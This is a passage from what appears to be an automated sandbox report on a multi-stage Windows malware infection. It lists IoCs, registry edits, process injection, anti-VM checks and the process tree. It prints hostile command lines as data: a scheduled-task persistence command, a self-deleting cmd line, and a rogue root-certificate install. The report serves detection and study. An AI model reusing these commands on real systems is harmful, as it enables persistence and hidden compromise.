Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	VAd2LBJDml5xeUucS9EAra8f.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3938118698-2964058152-2337880935-1000\{C51E317B-A7DC-4AA8-8EC2-B8CBB0CA70E0}	chrome.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

Processes:

keks.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	keks.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	keks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

mstc.exe

pid process

5244 mstc.exe

pid	process
5244	mstc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeexplorta.exeexplorta.exeamert.exechrome.exe2c03579092.exechrosha.exeexplorta.exerundll32.exetrf.exepowershell.exeloader.exekeks.exejok.exepowershell.exepowershell.exe

pid	process
2184	654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
2184	654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
2492	explorta.exe
2492	explorta.exe
1592	explorta.exe
1592	explorta.exe
3684	amert.exe
3684	amert.exe
756	chrome.exe
756	chrome.exe
3020	2c03579092.exe
3020	2c03579092.exe
4956	chrosha.exe
4956	chrosha.exe
2828	explorta.exe
2828	explorta.exe
5140	rundll32.exe
5140	rundll32.exe
5140	rundll32.exe
5140	rundll32.exe
5140	rundll32.exe
5140	rundll32.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
2484	trf.exe
5140	rundll32.exe
5140	rundll32.exe
5140	rundll32.exe
5140	rundll32.exe
5720	powershell.exe
5720	powershell.exe
5720	powershell.exe
5728	loader.exe
5728	loader.exe
1864	keks.exe
1864	keks.exe
5728	loader.exe
3684	jok.exe
3684	jok.exe
4072	powershell.exe
4072	powershell.exe
4072	powershell.exe
3684	jok.exe
3684	jok.exe
5336	powershell.exe
5336	powershell.exe
5336	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

run.exe

pid process

2348 run.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

chrome.exe

pid process

756 chrome.exe
756 chrome.exe
756 chrome.exe
756 chrome.exe

pid	process
2348	run.exe

pid	process
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe
Token: SeShutdownPrivilege	756	chrome.exe
Token: SeCreatePagefilePrivilege	756	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

8a14325f02.exechrome.exeu47o.3.exe

pid	process
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
2060	8a14325f02.exe
756	chrome.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
3636	u47o.3.exe

Suspicious use of SendNotifyMessage 55 IoCs

Processes:

8a14325f02.exechrome.exeu47o.3.exe

pid	process
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
2060	8a14325f02.exe
3636	u47o.3.exe
3636	u47o.3.exe
3636	u47o.3.exe
3636	u47o.3.exe
3636	u47o.3.exe
3636	u47o.3.exe
3636	u47o.3.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

run.exemstc.exe

pid process

2348 run.exe
2348 run.exe
5244 mstc.exe

pid	process
2348	run.exe
2348	run.exe
5244	mstc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeexplorta.exe8a14325f02.exechrome.exe

description	pid	process	target process
PID 2184 wrote to memory of 2492	2184	654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe	explorta.exe
PID 2184 wrote to memory of 2492	2184	654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe	explorta.exe
PID 2184 wrote to memory of 2492	2184	654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe	explorta.exe
PID 2492 wrote to memory of 1364	2492	explorta.exe	explorta.exe
PID 2492 wrote to memory of 1364	2492	explorta.exe	explorta.exe
PID 2492 wrote to memory of 1364	2492	explorta.exe	explorta.exe
PID 2492 wrote to memory of 3684	2492	explorta.exe	amert.exe
PID 2492 wrote to memory of 3684	2492	explorta.exe	amert.exe
PID 2492 wrote to memory of 3684	2492	explorta.exe	amert.exe
PID 2492 wrote to memory of 2060	2492	explorta.exe	8a14325f02.exe
PID 2492 wrote to memory of 2060	2492	explorta.exe	8a14325f02.exe
PID 2492 wrote to memory of 2060	2492	explorta.exe	8a14325f02.exe
PID 2060 wrote to memory of 756	2060	8a14325f02.exe	chrome.exe
PID 2060 wrote to memory of 756	2060	8a14325f02.exe	chrome.exe
PID 756 wrote to memory of 1632	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 1632	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 2596	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4344	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4344	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe
PID 756 wrote to memory of 4836	756	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

Processes:

loader.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	loader.exe

outlook_win_path 1 IoCs

Processes:

loader.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	loader.exe

C:\Users\Admin\AppData\Local\Temp\654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
"C:\Users\Admin\AppData\Local\Temp\654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2184

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2492

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
3⤵
PID:1364

C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3684

C:\Users\Admin\AppData\Local\Temp\1000016001\8a14325f02.exe
"C:\Users\Admin\AppData\Local\Temp\1000016001\8a14325f02.exe"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9b758ab58,0x7ff9b758ab68,0x7ff9b758ab78
5⤵
PID:1632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:2
5⤵
PID:2596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
5⤵
PID:4344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2204 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
5⤵
PID:4836

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:1
5⤵
PID:1104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3040 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:1
5⤵
PID:4108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4280 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:1
5⤵
PID:1552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3308 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:1
5⤵
PID:2888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4504 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
5⤵
PID:1692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
5⤵
- Modifies registry class
PID:4956

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
5⤵
PID:2444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4972 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
5⤵
PID:1020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5076 --field-trial-handle=1968,i,4360591634748029701,1240983840732622836,131072 /prefetch:8
5⤵
PID:3320

C:\Users\Admin\1000017002\2c03579092.exe
"C:\Users\Admin\1000017002\2c03579092.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3020

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1592

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:1844

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4956

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2712

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 888
3⤵
- Program crash
PID:4796

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4328

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4376

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2868

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2484

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
4⤵
PID:1768

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:2684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 364
3⤵
- Program crash
PID:1068

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:328

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 388
3⤵
- Program crash
PID:1740

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
2⤵
- Executes dropped EXE
PID:2108

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
3⤵
- Creates scheduled task(s)
PID:1744

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
2⤵
